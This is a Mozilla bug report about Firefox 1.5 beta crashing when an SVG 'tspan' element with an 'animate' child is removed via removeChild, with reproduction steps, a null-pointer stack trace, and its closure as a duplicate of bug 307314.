Closed Bug 308177 Opened 19 years ago Closed 19 years ago

Crashes FF1.5beta when 'tspan' with child element is removed from parent

Categories

(Core :: SVG, defect)

Product:
Core
Component:
SVG
Version:
1.8 Branch
Platform:
x86
Windows XP
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
RESOLVED DUPLICATE of bug 307314

People

(Reporter: doug, Unassigned)

References

(
URL
)

Details

(Keywords: crash) 

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4

In the test case at http://svg-whiz.com/svg/mozilla/tspan-removeChild-error.svg,
when a tspan which has a child element (in this case, an 'animate' tag) is
removed from a parent 'text' element, the browser will crash immediately. Note
that this does not happen to a 'circle' element with an 'animate' tag when it is
removed from a parent 'g' element.

This is a script issue with the method 'removeChild'.



Reproducible: Always

Steps to Reproduce:
1. Open the test file (http://svg-whiz.com/svg/mozilla/tspan-removeChild-error.svg)
2. Click on the text that says "If you remove this 'tspan' (by clicking on it),
FF will crash"
3. Browser crashes.

Actual Results:  
Browser crashes.

Expected Results:  
The 'tspan' element should be removed, with no stability problems.

This use case is not unusual, and may cause many existing SVG WebApps to crash FF.
No crash on trunk, possible branch-only.
Version: Trunk → 1.8 Branch
Confirming on branch. We crash in nsSVGTSpanFrame::GetCoveredRegion on
dirty_region->Combine(temp, &accu_region) since dirty_region is a null pointer.
I don't have time to look at this in detail right now, but here's the top of the
stack.

gklayout.dll!nsCOMPtr<nsISVGRendererRegion>::operator->()  Line 849 + 0x22	C++
gklayout.dll!nsSVGTSpanFrame::GetCoveredRegion()  Line 475 + 0x8	C++
gklayout.dll!nsSVGTextFrame::RemoveFrame(nsIAtom * aListName=0x00000000,
nsIFrame * aOldFrame=0x04119168)  Line 414 + 0x10	C++
gklayout.dll!nsFrameManager::RemoveFrame(nsIFrame * aParentFrame=0x04118fe0,
nsIAtom * aListName=0x00000000, nsIFrame * aOldFrame=0x04119168)  Line 705	C++
gklayout.dll!nsCSSFrameConstructor::ContentRemoved(nsIContent *
aContainer=0x043eba20, nsIContent * aChild=0x043c0ed8, int aIndexInContainer=1,
int aInReinsertContent=0)  Line 9786 + 0x15	C++
gklayout.dll!PresShell::ContentRemoved(nsIDocument * aDocument=0x042c2408,
nsIContent * aContainer=0x043eba20, nsIContent * aChild=0x043c0ed8, int
aIndexInContainer=1)  Line 5526	C++
gklayout.dll!nsDocument::ContentRemoved(nsIContent * aContainer=0x043eba20,
nsIContent * aChild=0x043c0ed8, int aIndexInContainer=1)  Line 2403	C++
gklayout.dll!nsGenericElement::RemoveChildAt(unsigned int aIndex=1, int
aNotify=1)  Line 2793	C++
gklayout.dll!nsGenericElement::RemoveChild(nsIDOMNode * aOldChild=0x043c0f14,
nsIDOMNode * * aReturn=0x0012d674)  Line 3255 + 0x11	C++
gklayout.dll!nsSVGTextElement::RemoveChild(nsIDOMNode * aOldChild=0x043c0f14,
nsIDOMNode * * aReturn=0x0012d674)  Line 75 + 0x14	C++
Status: UNCONFIRMED → NEW
Ever confirmed: true
Keywords: crash
Probably a dup of bug 307314 (fixed on trunk, waiting branch approval).

Indeed. Thanks for the report anyway Doug.

*** This bug has been marked as a duplicate of 307314 ***
Status: NEW → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.